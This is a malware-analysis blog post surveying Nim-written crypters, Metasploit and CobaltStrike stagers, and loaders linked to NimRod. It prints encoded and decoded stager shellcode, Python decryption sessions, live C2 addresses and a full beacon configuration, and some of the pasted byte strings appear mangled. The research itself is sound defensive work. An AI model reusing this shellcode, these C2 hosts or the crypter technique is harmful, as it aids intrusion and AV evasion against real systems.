Crypto 24 / 7 News

Investigation into the state of Nim malware Jason Reaves Follow Mar 1 · 7 min read
By: Jason Reaves and Joshua Platt
Whenever malware is found to be written in new programming languages the AV detections are generally lacking because the new language is producing bytecode sequences that are relatively unknown along with strings of data that can throw off static based heuristic models.It also usually causes stress within the malware reverse engineering community as was seen with GoLang malware initially.
Enter Nim[1], which was used to create a repository of code examples leveraging Nim for red team related utilities but malware developers take notice of things that can be leveraged for more infections including compiled programming languages that bypass AV detections.This was brought more to light recently in a report we put out going over a new loader being leveraged by the TrickBot cybercrime group that was written in Nim, NimRod[5], much the same as they use BazarLoader[3] and some of the concepts or development requirements for Baza could of been imposed on NimRod after all they are both being leveraged as loaders to deliver CobaltStrike primarily[4].
This left me wondering what else was out there in the world of Nim malware, this report is a compilation of my findings.
Nim Crypter First we have possibly an adversary leveraging code from OffensiveNim to conceal an onboard encrypted binary, something we would normally refer to as a Crypter in the malware world but is a tool that is designed to bypass AV by wrapping a layer around a binary that would otherwise be detected.
MD5 : 507500d9c55ac4db55c7ea4adfe1380b SHA-1 : 32dbaa97622f51a05cd9ad358837242985e6abdb SHA-256 : f76e2d411831c549ce1111d93ebb724da1835114d91a5c7e6c5e5651da1106e5
This is using publicly available code from OffensiveNim but also step-by-step instructions[6,7] that are available for how to use the code to crypt up and deliver a .NET assembly.The standard method in the repo involves storing the file AES encrypted and Base64 encoded, we can reverse the process to statically recover the onboard file.
>>> from Crypto.Cipher import AES
>>> from Crypto.Util import Counter
>>> import hashlib
>>> k = hashlib.sha256(‘TARGETDOMAIN’).digest()
>>> import base64
>>> b = base64.b64decode(b)
>>> c = base64.b64decode(‘VcVWbuX3TM+koCBd+2YHrw==’)
>>> int(binascii.hexlify(c),16)
114009015196344035509101775155687196591L
>>> ctr = Counter.new(128, initial_value=114009015196344035509101775155687196591)
>>> aes = AES.new(k, AES.MODE_CTR, counter=ctr)
>>> aes.decrypt(b)
‘MZx90x00x03x00x00x00x04x00x00x00xffxffx00x00xb8x00x00x00x00x00x00x00@x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x80x00x00x00x0ex1fxbax0ex00xb4txcd!xb8x01Lxcd!This program cannot be run in DOS mode.rrn$x00x00x00x00x00x00x00PEx00x0
In this case it is loading a GruntHTTP stager:
https://yeshua.vip:443
2E4D5B0FEE977939ED85AAFB89CC40F8B2350385
VXNlci1BZ2VudA==,Q29va2ll
TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgNi4xKSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNDEuMC4yMjI4LjAgU2FmYXJpLzUzNy4zNg==,QVNQU0VTU0lPTklEPXtHVUlEfTsgU0VTU0lPTklEPTE1NTIzMzI5NzE3NTA=
L2VuLXVzL2luZGV4Lmh0bWw=,L2VuLXVzL2RvY3MuaHRtbA==,L2VuLXVzL3Rlc3QuaHRtbA==
i=a19ea23062db990386a3a478cb89d52e&data={0}&session=75db-99b1-25fe4e9afbe58696-320bea73 MD5 : e65a69688e0c75f41f1388c82e1069ba SHA-1 : a15573c6dabadce1dc3a5ebb1f135b64025987d4 SHA-256 : 311e49ca50489eb9c9127e42e4ab2c39d5311754e9475236a5431d917774dccf
Another usage of OffensiveNim code as a crypter but this time direct references to SharpKatz which was explained in the PPN github repo[6].

Decoding out the onboard file in the same manner leaves us with SharpKatz:
UserschippyDesktopHACKING_RESOURCESSharpKatz-masterSharpKatzobjDebugSharpKatz.pdb
Nim Stagers A common area where we saw GoLang being used when malware developers started noticing it was with stagers or Meterpreter or CobaltStrike, the same pattern holds true for Nim as well.
MD5 : e65a69688e0c75f41f1388c82e1069ba SHA-1 : a15573c6dabadce1dc3a5ebb1f135b64025987d4 SHA-256 : 311e49ca50489eb9c9127e42e4ab2c39d5311754e9475236a5431d917774dccf
The shellcode is in the clear and appears to be Metasploit code for downloading and executing a next stage, even with the shellcode in the clear the detections at time of upload to VirusTotal were 4/66.
Here we can see that the next stage will be pulled from 45.43.2.118 but this was down at the time I discovered the file, the IP address was associated with being a CobaltStrike C2 at one point in time according to VirusTotal data.
Photo credit: VirusTotal MD5 : 78a94df84f31c12a428cbdeeb179dc6b SHA-1 : 6f8928478f77fba483e0c3bd77610f996da97e9a SHA-256 : 18d1776dae59d2b4d083cb204cae2ab73f50baac07bd69068343a6cc523c0de2
This is also a stager but this time the shellcode is obfuscated, the first layer is base64.
uGY9pAPzVQhtiSUAgUPskzKDdniP5h4btXJZaNKEUS6v2MrXnhXA9lv+f85M4Lw3mdlgnWPkq0eVM+GQqoYHspYkh8vWZUJ3KtqupskpBPx7Z19NRdM1hQUo5SLyHWnvcMViubY5AZLRmOsxUvTf6W7nemyfK9UUDsch3MQTdVwjRm8YrA87U+iA/cyXjoon97qafqFqWPW/wagMszi+VOpet0uIcd08edBE7TaRBvjDpRdW4j+pXTD5Sgtz/1pQHKfISGENCkD71H0to2tPFqCcz4wClKIgV0HwgrsaERkJ+s06ZCzxNOM+tIsSdMKxfCZJTrAfvS/uja2bxhDe20/DETXaiMILCwvZHtm/bB6zw2scRcPrbDLD62yDw+ts18PrGb/DhaK6ulNrTMNrJoSnxPDU5dfZmUzF2WaZtKts2R7D62zX60anw2apAQwTg7vUfhnriaQLCwvDVybtUcNmqb/rw4Oq68fX8map6LPDvUzZ6+ekw2ZEU2tMw2smhNmZTMXZZpmdLX7mLAQsQQdUZWh+IZaq68dB8mapAdnrm8Oq68fA8map2etOpMNmqdmW2ZahGr7Zltka2b7DEQ7X2Wy9LZbZGr7D6+xvzr29vbeVC/KeR15wXnBF7QvZs/IJFSwJ5tmRLEfxPr12w2tMw2scU2smU2tM2b/Zv9mR47Oowb12ary+wwmZ2QDQ9QsLU2tM2R7ZHpUE2R7ZkdgJdPy9dmoaKMMJmcNrHPIJIVNrTGwbC9THHWxs2ZFqBh+GvXbDCfzDEbC/lcZSwwnmwwlJ8nkmvb29vVNrTGxs2ZHLroNQvXZXJoVXM2YLC8O90oUd02YLC2pVbzVmCwuI1r29vfdTYIdTCxUyuuyLoPcx1cJXvFxgbks33MgPoW3oEA4vFwapgt/OlkhIIiZLlxhnnyUUmRDXeU25LRBxoXXAlkHANrHsszex8Gf4du2pNGALBrxFGcvZUUVw7ePXU4JyXnNzxPdWH7jXWTSCCGDE7V5ic0WG11OH8lTXZR+4htfYXnDkgke81/Of16wfa4bX2M7YrOeG158ZXuRFcO33Vh+4htdGzvJUZYZU8waHTcXGCw8YTMbLy41MBHLg3Z4UgrSFbJJ3647dtCUQeP6Tgw5u5D1oOa7Sj3WGM/bQQk/JytCUoSUH8qyLNxE6hKxe67mBI4X0BBUAIK11knL+MVTPos4kn5qyB/jumkzfw+VffAhNkZ8qdzSvrHVl/Jw7lX5mNJz+D00kmpYb1ySINwlN3LAbGd+7tDjtojc9QgSbp1FXdjxFPVww052A4OddVdpu+Rb6UjVCgMpSoDtKNmQeph+dW4UJionpUPxaAF/bnbb7unnxUTm5ntIelJe+C9me2hjWs712w2tMkQsLxwvZAAv9CwvZY8cLCwvZkZYDh1q9dsMPh4fDCXHDCebDCUnZAAvXCwvyCbnZkexACbS9dsMRfNdXJu1kAes+w2awVyZ+I5aWlsNYCwsLC7+wiHSKvb1rZRAfa6ydH2sfa7gL7OezEw==
After Base64 decoding this the sample will then treat the first 256 bytes as a lookup table to deobfuscate the remaining data.
>>> tbl = a[:256]
>>> data = a[256:]
>>> data = bytearray(a[256:])
>>> out = “”
>>> for i in range(len(data)):
…out += tbl[data[i]]
…
>>> out
‘xfcHx83xe4xf0xe8xc8x00x00x00AQAPRQVH1xd2eHx8bR`Hx8bRx18Hx8bR Hx8brPHx0fxb7JJM1xc9H1xc0xac{xc6xe5xb8xefx828xa9x9bJxc7&g3xf9xbexcfQxa1xf5Zx00Axbexf0xb5xa2Vxffxd5H1xc9xbax00x00@x00Axb8x00x10x00x00Axb9@x00x00x00AxbaXxa4Sxe5xffxd5Hx93SSHx89xe7Hx89xf1Hx89xdaAxb8x00 x00x00Ix89xf9Axbax12x96x89xe2xffxd5Hx83xc4 x85xc0txb6fx8bx07Hx01xc3x85xc0uxd7XXXHx05x00x00x00x00Pxc3xe8x9fxfdxffxff192.168.1.10x00x124Vx’
The decoded data is CobaltStrike stager shellcode with a local IP address.We were able to pivot on this technique of decoding the shellcode to find another stager using the same decoding mechanism to a live C2:
MD5: 76c7bb63fb46ecd31bee614e2760fc2f
SHA-1: 8dcc70fcbeb7231986fe9420f7cd8bc8a1223ddf
SHA-256: d7cdf7bca8c90d21e64b0c790ce5aa9124623dd2788088c81160703e00ff2052
The shellcode stager this decodes out goes to:
35.241.81.15/AdhP
Which contains a shellcode wrapped CobaltStrike beacon when downloaded.
{‘ProcInject_Execute’: ‘x06x00Bx00x00x00x06ntdllx00x00x00x00x13RtlUserThreadStartx00x01x08x03x04’, ‘PROXY_BEHAVIOR’: ‘2’, ‘PROTOCOL’: ‘8’, ‘SPAWNTO_X64’: ‘%windir%\sysnative\dllhost.exe’, ‘SLEEPTIME’: ‘45000’, ‘KillDate’: ‘0’, ‘C2_VERB_GET’: ‘GET’, ‘ProcInject_StartRWX’: ‘4’, ‘DOMAINS’: ‘35.241.81.15,/jquery-3.3.1.min.js’, ‘HostHeader’: ”, ‘ProcInject_Prepend_x86’: ‘x02x90x90’, ‘ProcInject_MinAllocSize’: ‘17500’, ‘ProcInject_UseRWX’: ’32’, ‘MAXGET’: ‘1403644’, ‘USERAGENT’: ‘Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko’, ‘PORT’: ‘443’, ‘UsesCookies’: ‘1’, ‘ProcInject_AllocationMethod’: ‘1’, ‘PUBKEY’: ‘30819f300d06092a864886f70d010101050003818d003081890281810088c000e1ce2599a1d5b93de6ed952dae15bb46b769862fe97fbce12b48bd790b3f63c07eb1f5596539aabaca02166cd8aad7182e10138553a9d3335af785e8bd2c6f55707faeb8db13800ae9aa7ce11cf23abf887d12296747a14329d8a35599ea35c9d8a97d3ac5b0ed69cc3a8daf534f241d6415e15e16e259ad05abad90a10203010001’, ‘C2_POSTREQ’: “[(‘_HEADER’, 0, ‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’), (‘_HEADER’, 0, ‘Referer: http://code.jquery.com/’ ), (‘_HEADER’, 0, ‘Accept-Encoding: gzip, deflate’), (‘BUILD’, (‘MASK’,))]”, ‘WATERMARK’: ‘1359593325’, ‘textSectEnd’: ‘177872’, ‘bStageCleanup’: ‘1’, ‘SPAWNTO_X86’: ‘%windir%\syswow64\dllhost.exe’, ‘C2_REQUEST’: “[(‘_HEADER’, 0, ‘Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8’), (‘_HEADER’, 0, ‘Referer: http://code.jquery.com/’ ), (‘_HEADER’, 0, ‘Accept-Encoding: gzip, deflate’), (‘BUILD’, (‘BASE64URL’,)), (‘HEADER’, 0, ‘Cookie’)]”, ‘CRYPTO_sCHEME’: ‘0’, ‘ITTER’: ’37’, ‘C2_VERB_POST’: ‘POST’, ‘SPAWNTO’: ”, ‘bCFGCaution’: ‘0’, ‘SUBMITURI’: ‘/jquery-3.3.2.min.js’} MD5 : bde13c029b14a133b13fcd875af3567c SHA-1 : e57396cfeac27076f2660c36e650d24bd37ca804 SHA-256 : 993ea418f841fce636986d3e61aed7ac2b3a03c7d3e8a539ac5c81c7b85637f5
This also turns out to be a CobaltStrike stager with a local IP address but the data is encrypted using 3DES with the key on top of the encrypted data:
The last stager we are going to look at it has a few more layers of encoding on the stager shellcode but it also currently only has 5 detections on VirusTotal.
MD5: 0a7b2ae58ac40dfd7a972a6cff81315a SHA-1 : df466c910cd0f6b6672d2e4396b84fc071cdc11f SHA-256 : 590e2308bd76873a1a518e162bbf10173a0bc69a0380c606d0f10c058cbffb0e
The XOR key for the shellcode is stored single byte XOR encoded itself:
Then the encoded stager shellcode is copied:
The encoded shellcode and XOR key are then passed to a function calling itself showStr:
This function will actually be decoding the shellcode:
The steps are Base64 decode -> XOR -> unhexlify which leaves us with another stager shellcode blob:
xfcxe8x89x00x00x00`x89xe51xd2dx8bR0x8bRx0cx8bRx14x8br(x0fxb7J&1xff1xc0xacx00Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8rnAccept-Language: en-US,en;q=0.5rnHost: code.jquery.comrnAccept-Encoding: gzip, deflaternUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36rnx00x1d-Cx81x94xc82xafx1exe0x97!x00hxf0xb5xa2Vxffxd5j@hx00x10x00x00hx00x00@x00WhXxa4Sxe5xffxd5x93xb9xafx0fx00x00x01xd9QSx89xe7Whx00 x00x00SVhx12x96x89xe2xffxd5x85xc0txc6x8bx07x01xc3x85xc0uxe5Xxc3xe8xa9xfdxffxff192.168.161.2x00Qtxbfm’
Loaders Aside from NimRod there appears to be other loader malware out there written in Nim that shares some code similarity with NimRod in regards to the string encoding technique, whether this mean they are based on similar code bases or were developed by the same person is unsure.
MD5 : 325a71e33559a634ec08bccd0d3898f8
SHA-1 : de3a15fb7b7571cc697b8c262e56e4be31c74302
SHA-256 : bdf20694e32d8305b859bf0d36b62078fd9ec330ece3f37e8192ff738165faee
The CAB file contains two files in it which are both written in Nim and contain the same string encoding routine as NimRod.
Date Time Attr Size Compressed Name
2021-01-09 00:22:40 ….A 112248 Loader.exe
2021-01-09 00:22:14 ….A 302200 reader_sl.exe.